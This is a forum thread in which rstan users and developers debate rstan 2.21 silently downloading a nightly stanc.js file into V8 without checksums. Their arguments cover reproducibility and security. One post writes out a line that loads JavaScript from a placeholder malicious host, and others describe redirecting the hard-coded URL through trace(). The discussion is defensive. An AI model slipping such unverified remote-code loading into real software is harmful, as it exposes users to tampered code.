Dangerous design in rstan 2.21

mespe · July 9, 2020, 2:56pm

The current version of rstan requires V8 to retrieve Javascript code from https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js. I believe this is a poor design decision for the following reasons:

Inability to execute without internet access (I often work in areas without internet access)
Hides the Javascript code, making code review and verification more difficult.
Lack of reproducibility, given that the javascript can be updated in significant ways without a change in rstan versioning
Many commits to rstan are not GPG verified, creating a potential security vulnerability. Additionally, there are no SHA checks on the file, nor any verification that it is from a trusted source.
V8 is not a small dependency. On my system, I have to build from source, which takes 45 min

These issues are significant enough that I will not be installing the current version of rstan, and am removing the dependencies on rstan in my packages where I can.

I encourage the developers to reconsider this design.

bgoodri · July 9, 2020, 3:02pm

It just times out if there is no internet access
The javascript stanc3 is from https://github.com/stan-dev/stanc3/releases/tag/nightly but it is not really human readable. It is derived from the OCaml stanc3.
We need to change the javascript in between rstan releases so that we can iron out the bugs, such as https://github.com/stan-dev/stanc3/issues/611 , before we can get rid of the non-javascript parser and bundle the released javascript stanc3 with rstan or StanHeaders
If you have to compile the V8 package from source, then it may take a while but you would have to do that anyway for rstan 2.24.

mespe · July 9, 2020, 3:16pm

My points still stand - this is a dangerous design, and should be reconsidered.

Timing out is not helpful. It means rstan is unusable without internet access. Why should my modeling software require internet to work?
Human readable is not the point. I often use meta-programming to review code before installing. This adds a layer of obfuscation, and complicates code review because the code needs to be reviewed each time I compile a stan model. You might not read this code, but that does not mean the code should not be easy to review.
This should be reserved for a development version, then. I need to reproduce even bugs - having software that silently updates/changes is terrible for reproducible science.
There are systems (cloud compute) where I do not want to spend 45 min compiling V8.

Unaddressed in your response: this is a big security issue.

These changes are making rstan unusable for my current situations, and difficult to recommend for clients. I hope you reconsider.

bgoodri · July 9, 2020, 3:37pm

That is just not correct. RStan 2.21 uses the old stanc parser but then checks whether the program would also parse with the next stanc:

github.com

stan-dev/rstan/blob/develop/rstan/rstan/R/stanc.R#L59


      
          if (is.null(attr(model_code, "model_name2")))
            attr(model_code, "model_name2") <- model_name2
          
          model_code <- get_model_strcode(file, model_code)
          if (missing(model_name) || is.null(model_name))
            model_name <- attr(model_code, "model_name2")
          
          model_attr <- attributes(model_code)
          model_code <- scan(text = model_code, what = character(), sep = "\n", quiet = TRUE)
          
          # Remove trailing whitespaces
          model_code <- trimws(model_code, "r")
          
          includes <- grep("^[[:blank:]]*#include ", model_code)
          while(length(includes) > 0) {
            for (i in rev(includes)) {
              header <- sub("^[[:blank:]]*#include[[:blank:]]+", "", model_code[i])
              header <- gsub('\\"', '', header)
              header <- gsub("\\'", '', header)
              header <- sub("<", "", header, fixed = TRUE)
              header <- sub(">", "", header, fixed = TRUE)

If the download times out after 5 seconds, then it just returns FALSE and moves on with the generated C++ code by the old stanc.
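The "time out, return FALSE, move on" behaviour described above can be sketched in a few lines of base R. This is only an illustration, not rstan's implementation: `best_effort_check()` and its `check` argument are hypothetical names, and the `timeout` option is the one base R applies to some of its own internet operations.

```r
# Hypothetical helper, not rstan's code: run a check that may need the
# network and turn any failure (including a timeout) into FALSE.
best_effort_check <- function(check, timeout_sec = 5) {
  old <- options(timeout = timeout_sec)  # limit for some base R internet operations
  on.exit(options(old), add = TRUE)      # restore the previous setting on exit
  tryCatch(isTRUE(check()), error = function(e) FALSE)
}

# Simulated outcomes; no real download is attempted here.
failed    <- best_effort_check(function() stop("connection timed out"))
succeeded <- best_effort_check(function() TRUE)
```

Either way the caller only ever sees a logical value, so a failed download cannot change what is compiled afterwards.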

So, the security considerations from the generated C++ code are no different than what they have been for the last 6 years that the old stanc has been on CRAN. Someone malicious would have to get a PR merged that makes stanc3 do something malicious even though the C++ code it generates is not compiled. And if they can do that, they can do that for Stan 2.24 in which case the danger will still be there when StanHeaders / rstan 2.24 comes with it.

mespe · July 9, 2020, 9:40pm

This is not true - I can substitute the URL inside the function body of stanc_beta() with a simple call to trace() to point the function at whatever javascript I want. R code is extremely mutable, so you cannot assume a hard coded URL provides security. The security concern is that you are pulling a file from the internet and compiling it into the model with zero verification that it should be trusted. For the current C++, I can check the code in the current version of, e.g. StanHeaders, and once checked I can be reasonably sure it will not change unless I update the package. Here, the code can change daily or to a different source URL with no indication to the end-user. For it to be secure, you need to, at minimum, provide some verification. You should also provide versioning and a notice to the end-user.
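The mutability argument can be illustrated on a toy function without touching rstan at all. The sketch below is an assumption-laden illustration: `fetch_js()` and both URLs are made up, nothing is downloaded, and it uses `body<-` on a local function rather than `trace()` on a package namespace.

```r
# Toy function with a hard-coded URL. A real function would download from
# `url`; this one only returns the string so the example stays offline.
fetch_js <- function() {
  url <- "https://example.org/trusted.js"
  url
}

# Functions are ordinary R objects, so the constant inside the body can be
# replaced at run time without editing any source file.
patched <- fetch_js
body(patched)[[2]][[3]] <- "https://example.org/other.js"

original_url <- fetch_js()
patched_url  <- patched()
```

The original definition is untouched while the patched copy points somewhere else, which is why a hard-coded URL on its own does not tell you what was actually loaded.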

Your second point is exactly the problem with this design - the behavior of my model can depend on whether github/my connection is down. This is not reproducible! I cannot use rstan without some assurance that it is reproducible (nor should any scientist).

Or put another way, when I report my results, do I need to also report the exact date and time that the model was compiled? And even with that, is there any way for someone to get that version of the nightly build to reproduce my results?

Bluntly, this is a bad design to ensure a Stan model is reproducible, and a worse one to ensure it is secure. Please re-evaluate this design.

mespe · July 9, 2020, 9:56pm

And, if you would like proof of concept, I am happy to write some malicious R code to demonstrate this concern.

To be clear, to abuse this, I do not need control of rstan’s source at all.

bgoodri · July 9, 2020, 10:14pm

Whether or not RStan 2.21.x checks whether the Stan program parses with the nightly javascript stanc3 has literally nothing to do with the reproducibility of the MCMC results because it has absolutely zero effect on the C++ code that gets generated by the old stanc parser. To verify, you can look at the GitHub code that I linked to before

github.com

stan-dev/rstan/blob/develop/rstan/rstan/R/stanc.R#L59


      

The old stanc runs the same as it has for six years, and then in line 59 it conditionally calls stanc_beta(), which returns either TRUE or FALSE rather than any code. stanc does nothing with that TRUE or FALSE and unconditionally returns the r that it defined up on line 38.
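The control flow just described can be reduced to a toy version. All names here (`legacy_parse()`, `toy_stanc()`, `new_parser_check`) are hypothetical stand-ins rather than rstan's functions; the point is only that the return value is fixed before the extra check runs.

```r
# Stand-in for the old parser: produces the "C++" that would be compiled.
legacy_parse <- function(model_code) {
  paste0("// C++ from the legacy parser for: ", model_code)
}

toy_stanc <- function(model_code, new_parser_check = NULL) {
  r <- legacy_parse(model_code)      # the result is determined here
  if (!is.null(new_parser_check)) {
    new_parser_check(model_code)     # returns TRUE or FALSE; value is discarded
  }
  r                                  # returned regardless of the check
}

# Same output whether the extra check passes, fails, or is skipped.
out_pass <- toy_stanc("data {}", function(code) TRUE)
out_fail <- toy_stanc("data {}", function(code) FALSE)
out_none <- toy_stanc("data {}")
```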

Or you can verify by running

example(stanc, package = "rstan", run.dontrun = TRUE) # defines stanmodelcode
writeLines(r$cppcode)

whose first few lines are

// Code generated by Stan version 2.21.0
#include <stan/model/model_header.hpp>
namespace model7ee02059f29e_normal1_namespace {
using std::istream;

If instead we call

ctx <- V8::v8()
ctx$source("https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js")
writeLines(ctx$call("stanc", "security_flaw", "data {}")$result)

the first few lines are

// Code generated by stanc 458a7933
#include <stan/model/model_header.hpp>
namespace security_flaw_namespace {
inline void validate_positive_index(const char* var_name, const char* expr,

Clearly the C++ code being generated by rstan::stanc(), which is subsequently compiled and executed, is not the C++ code that the javascript produces, which is not compiled and executed, because we are only using the javascript version to test if that Stan program will continue to work once Stan 2.24 is released.

So, the only difference is that you might get a message saying that your Stan program won’t work in the future and you should file an issue; the MCMC results are going to be the same either way.

bgoodri · July 9, 2020, 10:20pm

If someone were to call trace or debug(rstan:::stanc_beta), then they could source a random javascript file into that V8 context. But they can also just do in the R global environment

ctx <- V8::v8()
ctx$source("http://malicious.js")

There are tons of hackers out there in the world who are trying to come up with ways to break out of the virtual machine that V8 runs the javascript in. And sometimes they succeed. But those hackers will still be hacking when Stan 2.24 is released.

mespe · July 9, 2020, 11:10pm

Thank you for the clarification - I see that this is not currently getting used, but my concern is that this was the design going forward (i.e. stanc_beta() would become stanc()). You seem to indicate this is not the case. Sorry for misunderstanding that this would not be how rstan 2.24 operates.

However, the security concern still stands: The concern here is not that malicious code can be executed at the console - of course the biggest security threat is the end user. Of course you can cause havoc by getting the user to type code, or even just sourcing in bad code. That is the reason there is a general warning against source()-ing R scripts from URLs.

The issue here is your “trusted” function loads this javascript code without verification, silently. Most end users will not know this is even happening. The key difference here is that rstan is a “trusted” application by many users, but this mechanism should not be trusted. It is extremely easy to manipulate.

bgoodri · July 10, 2020, 12:06am

The plan is (and has been) for RStan 2.24 to come with a released version of the javascript version of stanc3, at which point the (internal) rstan:::stanc_beta() function will cease to exist and its body will be mostly transplanted into the body of the (exported) rstan::stanc() function, except that it will use the javascript file that it comes with rather than downloading it from the internet.

But we can’t release an RStan 2.24 until we have squashed almost all of the known bugs with the javascript stanc3, which is why we need to check thousands of Stan programs against the nightly javascript stanc3 in the next few weeks as we merge more PRs into it. V8 is safer than R or C++ or most other languages in that it does not let the javascript access the filesystem, which is why we have to use the C preprocessor to first process the #include statements in Stan files in stanc_beta(). Downloading over https from a fixed URL is a lot safer than some other things. I honestly have little idea how the OCaml parser works or how it gets translated into javascript, but I have to trust the Stan developers that maintain it. Without that, there are all sorts of ways that code in the Stan repos could potentially do malicious things.

mespe · July 10, 2020, 3:41am

“A lot safer than some other things” is not particularly reassuring.

rok_cesnovar · July 10, 2020, 4:35am

So you are saying that what worries you is that Stan devs will manipulate the OCaml code which is translated to javascript by the build script to do something malicious? How does that change compared to the R code or C++ code?

It does not. In order to do something malicious one would have to change the codebase and get a PR to pass the code review. This is the same as it has always been for C++ or OCaml.

You can either trust the Stan devs or read the codebase to make sure. And this is the same with rstan 2.19, 2.0, 2.24 and any other Stan interface or any open source project.

rok_cesnovar · July 10, 2020, 4:41am

You can easily do almost anything you want with R code as well. Just because a part of the codebase has changed the language in which it is written does not make it any less safe. If anything, the fact that JS runs in a virtual engine makes it safer, not more dangerous.

mespe · July 10, 2020, 2:24pm

Actually, my concern has nothing to do with Stan Devs. You are misunderstanding the threat here.

To abuse this, you DO NOT need to get a PR on Stan, you do not need to have any interaction with the source code.

The attack vector is that “hard coded” URLs in R code can be easily manipulated in R because R allows you to program on the language. It would be trivial to point this URL at a different site and download a different javascript script without 1) altering the code base on github/CRAN/etc., 2) the end user knowing anything was different. All I need to know is that rstan v2.21 is installed on a system.

In general, R users are heavily discouraged from source()-ing scripts from URLs because it can be really dangerous. This recent rstan change does just that.

This has nothing to do with changing coding languages, nothing to do with PR on github, nothing to do with trusting the Stan Dev. team. This specific method is insecure by nature - you should NOT download and execute code from a URL without some verification that the script is the one you expect. This is the foundation of checksum systems.
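A minimal sketch of the kind of checksum verification meant here, assuming the digest package is installed. `verify_sha256()` is a hypothetical helper, and a local temporary file stands in for the downloaded script so that nothing is fetched from the network.

```r
# Hypothetical helper: TRUE only if the file's SHA-256 digest matches a value
# pinned ahead of time (for example, one shipped inside the package).
verify_sha256 <- function(path, expected_sha256) {
  actual <- digest::digest(path, algo = "sha256", file = TRUE)
  identical(tolower(actual), tolower(expected_sha256))
}

# Local stand-in for a downloaded script.
js_file <- tempfile(fileext = ".js")
writeLines("function stanc() { return 'ok'; }", js_file)
pinned <- digest::digest(js_file, algo = "sha256", file = TRUE)

ok_before <- verify_sha256(js_file, pinned)   # file unchanged since pinning

# Any modification, however small, changes the digest.
cat("// tampered\n", file = js_file, append = TRUE)
ok_after <- verify_sha256(js_file, pinned)
```

A check like this only helps if the pinned digest is distributed through a channel the user already trusts, which is also why it cannot be combined with a file that is meant to change every night.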

Yes, the virtualization layer of V8 provides some security, but V8 by default is not sandboxed. If you want to rely on V8 to provide sufficient security to run untrusted code, you need to do a lot more here.

At minimum, you should provide a means to turn off this “feature”. You have zero opt-in, zero documentation, and zero notification that this is happening. You have presumed that your users should accept this risk to aid your debugging.
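One common way to offer such a switch in R is a package option that defaults to off. The sketch below is illustrative only: the option name `mypkg.check_new_parser` and the helper `network_check_enabled()` are hypothetical and are not part of rstan.

```r
# "mypkg.check_new_parser" is a made-up option name used for illustration.
network_check_enabled <- function() {
  isTRUE(getOption("mypkg.check_new_parser", default = FALSE))
}

default_state <- network_check_enabled()   # off unless the user asks for it
options(mypkg.check_new_parser = TRUE)     # explicit opt-in by the user
opted_in_state <- network_check_enabled()
options(mypkg.check_new_parser = NULL)     # back to the default
```

Because the default is FALSE, a user who never sets the option gets no network access, and the option name gives the documentation something concrete to describe.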

You might feel comfortable with this, but I do not.

Charles_Driver · July 10, 2020, 2:28pm

Mespe – I think the point that needs clarifying is: If an attacker has access to R, in what way does having rstan on the system enhance the threat?

mespe · July 10, 2020, 2:52pm

The threat is that this provides a means to download and execute unknown code via a trusted program. I would guess few rstan users would expect that rstan is downloading new code and running it each time they build a model. Most would expect rstan to be self-contained.

A central idea with R package security, weak though it may be, is that you can inspect the source code BEFORE running it. However, this particular method is not secure. Here, new code is loaded and executed silently when the Stan model is parsed. That code is not signed or verified in any way.

The central point: I can verify Stan, rstan, etc. but rstan can then load code which is unverified.

If an R package had R code which did

source("https:.../my_script.R")

it would likewise be dangerous. There is a group that is working to flag R packages with this type of behavior and remove it.

Charles_Driver · July 10, 2020, 3:16pm

I can only follow your argument if you say you don’t trust the dev-team / their repositories. An attacker with access to R doesn’t need rstan to cause problems, as already demonstrated above.

aakhmetz · July 11, 2020, 6:42am

Yesterday I had some trouble compiling V8-r on Arch Linux, because the AUR package was broken and compiling V8 from source took a long time. Conda has the r-v8 package, but it is available only for R 3.6, not for 4.0.

Finally, installing the libv8 package via conda and then the V8 package from the R terminal solved the issue. The installation did not take much time.

josswright · July 11, 2020, 7:04am

(Following the slightly off-topic move…) Just for reference, I also had problems building the v8-r package on Arch Linux until very recently, but this should now have been fixed.

The problem came because the PKGBUILD relied on environment variables being shared between its prepare() and build() functions. That worked under makepkg, but broke under AUR helpers like yay. I managed to track down the issue and convince the package author to update the PKGBUILD.

So if your problem came due to installing using an AUR helper (and, if I remember rightly, gave an error relating to ninja) then you might want to check the latest update of the v8-r AUR package. (If it still doesn’t work, I’d try using makepkg directly.)

It still takes quite a while to build, though!

bgoodri · July 11, 2020, 2:58pm

source("https:.../my_script.R") would be a higher level of security risk than the line of rstan code in question, which is

github.com

stan-dev/rstan/blob/develop/rstan/rstan/R/stanc.R#L142


      
                                        isystem = isystem)
          
            stopifnot(stanc_ctx$validate("stanc"))
            formatted_code <- try(stanc_ctx$call("stanc", model_cppname,
                                  model_code, as.array("auto-format")),
                                  silent = TRUE)
            if (!inherits(formatted_code, "try-error") && !is.null(formatted_code$result)) {
              model_code <- formatted_code$result
            }
          }
          
          model_code <- stanc_process(file = file,
                                      model_name = model_name,
                                      auto_format = FALSE,
                                      isystem = isystem)
          
          out <- stanc(model_code = model_code,
                       model_name = model_name, verbose = verbose,
                       obfuscate_model_name = obfuscate_model_name,
                       allow_undefined = allow_undefined,
                       allow_optimizations = allow_optimizations,

If someone were to run source("https:.../my_script.R"), my_script.R could make system calls or call download.file to download a virus or things of that nature.

In contrast, ctx$source("https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js") doesn’t even “download” in the traditional sense; it reads the contents of

https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js

into a Javascript context in memory, without even writing anything into tempdir(). I am not entirely sure, but I believe merely calling ctx$source does not result in the execution of any Javascript; for that you have to ctx$call a function defined by the Javascript, whereupon it is executed in a virtual machine that is designed to prohibit access to the file system. So, unlike source("https:.../my_script.R"), the rstan code in question should not result in system calls or downloading viruses to the hard disk.

As far as I can see, the increased risks from introducing the internal function stanc_beta are

1. In principle, there could be a Man-In-The-Middle attack where it redirects the download to some other URL. However, such an attack is very unlikely over https and even less likely against GitHub, whose business model necessitates that it keep its TLS certificates up to date (i.e. without that, git clone https://github.com/... and many other git subcommands would be broken for the entire world). Moreover, the redirected download would still have to be a Javascript file (with a stanc method) that would still need to somehow escape the virtual machine to do any real damage. And someone with the skills to pull off an attack that awesome would target a larger user-base than Stan users.
2. There might be a variant of (1) where instead of deleting the hard drive, the stanc method in the malicious Javascript mines bitcoins or something. This is only somewhat more likely and seems more annoying than dangerous. Also, I believe it is the case that ctx gets garbage collected when stanc_beta() finishes, in which case it would only mine bitcoins for a few milliseconds and thus not be worthwhile.

I am sure any security researcher would say that using Stan is a big risk, largely because it compiles and executes C++ code that is generated on-the-fly and utilizes a bunch of huge libraries. However, Stan has not had a (known) security incident in 9+ years, and there are plausible reasons for that. The biggest risk is probably that someone gets a PR merged that maliciously changes the way the parser generates the C++ code, but I have to trust that the stanc3 devs are vigilant about that.

Finally, if any malicious hackers reading this know how to install OCaml from source on Windows in order to develop their viruses, please let us know.
